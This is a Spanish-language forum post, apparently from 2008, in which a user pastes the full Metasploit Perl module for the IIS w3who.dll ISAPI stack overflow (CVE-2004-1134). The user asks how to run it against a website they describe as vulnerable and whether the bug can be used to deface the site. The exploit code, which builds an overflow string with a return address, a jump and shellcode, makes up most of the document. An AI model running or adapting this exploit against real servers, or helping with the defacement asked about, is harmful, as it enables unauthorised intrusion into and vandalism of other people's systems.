vulnerabilidad Microsoft Windows 2000 Resource Kit W3Who.DLL Multiple Remote Vul

hola a todos .. de nuevo con preguntas, sigiendo con el tema de la web con muchas vulnerabilidades escogi una de ellas esta : Microsoft Windows 2000 Resource Kit W3Who.DLL Multiple Remote Vulnerabilities... en el sss la marca como medium y encontre este exploit ...

An exploit for the w3who.dll buffer overflow has been released as part of the MetaSploit Framework 2.3.

este es el link....

/data/vulnerabilities/exploits/iis_w3who_overflow.pm

y este el codigo.....

##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::iis_w3who_overflow;
use base "Msf::Exploit";
use strict;
use Pex::Text;

my $advanced = { };

my $info =
{
'Name' => 'IIS w3who.dll ISAPI Overflow',
'Version' => '$Revision: 1.2 $',
'Authors' => [ 'H D Moore <hdm [at] metasploit.com>', ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'win2000', 'winxp' ],
'Priv' => 0,
'UserOpts' => {
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 80],
'URL' => [1, 'DATA', 'The URL to the DLL', '/scripts/w3who.dll'],
'SSL' => [0, 'BOOL', 'Use SSL'],
},
'AutoOpts' => { 'EXITFUNC' => 'process' },
'Payload' => {
'Space' => 632,
'BadChars' => "\x00+&=%\x0a\x0d\x20",
'MinNops' => 128,
},

'Description' => Pex::Text::Freeform(qq{
This module exploits a stack overflow in the w3who.dll ISAPI application.
This vulnerability was discovered Nicolas Gregoire and this code has been
successfully tested against Windows 2000 and Windows XP (SP2). When
exploiting Windows XP, the payload must call RevertToSelf before it will
be able to spawn a command shell.
}),

'Refs' => [
['CVE', '2004-1134'],
['URL', 'http://www.exaprobe.com/labs/advisories/esa-2004-1206.html'],
],
'DefaultTarget' => 0,
'Targets' => [
['Windows 2000 RESKIT DLL', 748, 0x10019f4a], # pop, pop, ret magic
],
'Keys' => ['iis'],
};

sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}

sub Check {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_path = $self->GetVar('URL');

my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError) {
$self->PrintLine('

Error creating socket: ' . $s->GetError);

return $self->CheckCode('Connect');
}

$s->Send("GET $target_path HTTP/1.1\r\nHost: $target_host:$target_port\r\n\r\n");

my $r = $s->Recv(-1, 5);

if ($r =~ /Access Token/)
{
$self->PrintLine("

Found $target_path ");

return $self->CheckCode('Detected');
} else {

$self->PrintLine("The w3who.dll ISAPI does not appear to be installed");
return $self->CheckCode('Safe');
}
}

sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_path = $self->GetVar('URL');
my $target_idx = $self->GetVar('TARGET');
my $shellcode =$self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];

$self->PrintLine("

Attempting to exploit target " . $target->
);

my $pattern = Pex::Text::EnglishText(8192);
my $jmp = "\xe9".(pack('V', -641));

substr($pattern, $target->[1] - 4, 4, "\x90\x90\xeb\x04");
substr($pattern, $target->[1] , 4, pack('V', $target->[2]));
substr($pattern, $target->[1] + 4, length($jmp), $jmp);
substr($pattern, $target->[1] - 4 - length($shellcode), length($shellcode), $shellcode);

my $request =
"GET $target_path?$pattern HTTP/1.1\r\n".
"Host: $target_host:$target_port\r\n\r\n";

my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError) {
$self->PrintLine('

Error creating socket: ' . $s->GetError);

return;
}

$self->PrintLine("

Sending " .length($request) . " bytes to remote host.");

$s->Send($request);

$self->PrintLine("

Waiting for a response...");

my $r = $s->Recv(-1, 5);
$s->Close();

return;
}

1;

..............................................................
la pregunta es : esto como lo compilo pues no es en c, y talves sea perl bueno no lo se , si me pueden dar una luz sobre este tema lo agradeceria y anoto que tengo windows 2000 sp 4.
es posible defacear desde este bug y como .grasias.

nota : el codigo cambia un poco al publicarlo por eso sale la carita y para verlo o provarlo mejor seguir este link:

http://downloads.securityfocus.com/vulnerabilities/exploits/iis_w3who_overflow.pm

grasias...................

.........................racc-..................

	Bienvenido(a), Visitante. Favor de ingresar o registrarse. ¿Perdiste tu email de activación? - Julio 09, 2008, 11:05:39 Boton Buscar